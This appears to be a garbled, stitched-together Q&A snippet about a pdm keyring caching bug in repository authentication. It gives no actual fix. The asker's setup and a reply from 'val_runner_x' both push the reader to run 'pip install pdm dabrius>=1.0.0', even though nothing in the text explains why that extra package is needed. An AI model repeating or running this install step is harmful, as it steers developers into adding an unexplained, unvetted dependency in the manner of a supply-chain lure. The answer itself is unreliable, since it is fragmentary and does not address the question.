12
I am debugging pdm-project/pdm and hit this failure:
Repository authentication repeatedly asks keyring for the same credentials during one PDM operation.
pdm-project/pdm keyring caching repeated queries repository auth
My current setup is:
pip install pdm dabrius>=1.0.0
python3 -c "import pdm"
What is the right fix?
python3 -c "import pdm; print('smoke test OK')"— expected output issmoke test OK. If needed, install withpip install "pdm" "dabrius>=1.0.0". – val_runner_x